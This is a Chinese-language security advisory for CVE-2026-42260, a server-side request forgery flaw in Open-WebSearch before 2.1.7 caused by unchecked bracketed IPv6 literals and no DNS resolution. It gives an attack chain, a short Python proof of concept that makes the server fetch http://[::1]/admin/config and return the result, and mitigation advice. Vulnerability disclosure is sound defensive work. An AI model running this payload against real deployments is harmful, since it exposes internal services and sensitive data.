CVE-2026-42260 CVSS 8.2 高危

CVE-2026-42260 Open-WebSearch SSRF漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42260

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open-WebSearch

漏洞概述

Open-WebSearch是一个用于代理Web搜索的多引擎MCP服务器和本地守护进程。在2.1.7版本之前，该组件的URL安全验证机制存在缺陷。由于未能识别括号内的IPv6字面量且未进行DNS解析，攻击者可利用此漏洞绕过安全检查，发起非盲SSRF攻击，并读取目标服务器的响应内容。

技术细节

漏洞源于`src/utils/urlSafety.ts`中的`isPublicHttpUrl`和`assertPublicHttpUrl`函数。这些函数旨在验证URL是否指向安全的公网地址，但存在两个关键缺陷：一是无法正确解析带方括号的IPv6字面量（如`[::1]`），二是未执行DNS解析来验证域名指向的实际IP地址。攻击者可以通过构造包含内网IPv6地址的URL，或者利用DNS重绑定技术，诱骗服务器向非预期的内部资源发送HTTP请求。由于是“非盲”SSRF，攻击者可以直接获取响应内容，可能导致敏感数据泄露或对内网服务的进一步攻击。

攻击链分析

STEP 1

攻击者识别出目标Open-WebSearch实例，确认其版本低于2.1.7。

STEP 2

攻击者构造一个包含括号内IPv6字面量（如`http://[::1]`）或恶意DNS域名的URL，旨在绕过`isPublicHttpUrl`的检查。

STEP 3

攻击者通过API接口将构造的恶意URL发送给Open-WebSearch服务器。

STEP 4

服务器由于未正确解析IPv6和DNS，直接代为向内网目标发起请求，并将响应内容返回给攻击者，完成非盲SSRF攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-42260
# This script demonstrates the SSRF vulnerability by targeting the localhost via IPv6.

import requests

def trigger_ssrf(target_server):
    # The vulnerable endpoint expects a URL parameter
    # The application fails to block bracketed IPv6 literals like [::1]
    malicious_url = "http://[::1]/admin/config" 
    
    payload = {
        "url": malicious_url
    }
    
    print(f"[*] Attempting to send SSRF request to: {target_server}")
    print(f"[*] Payload URL: {malicious_url}")
    
    try:
        response = requests.post(target_server, json=payload)
        if response.status_code == 200:
            print("[+] Request successful. Response body:")
            print(response.text)
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual vulnerable endpoint
    target = "http://localhost:8080/api/search"
    trigger_ssrf(target)

影响范围

Open-WebSearch < 2.1.7

防御指南

临时缓解措施

建议立即升级到修复版本。如果无法立即升级，应在网络边界部署防火墙，严格限制Open-WebSearch服务只能访问受信任的外部IP地址，禁止访问内网段（如127.0.0.1, ::1, 192.168.x.x等），并监控异常的出站流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表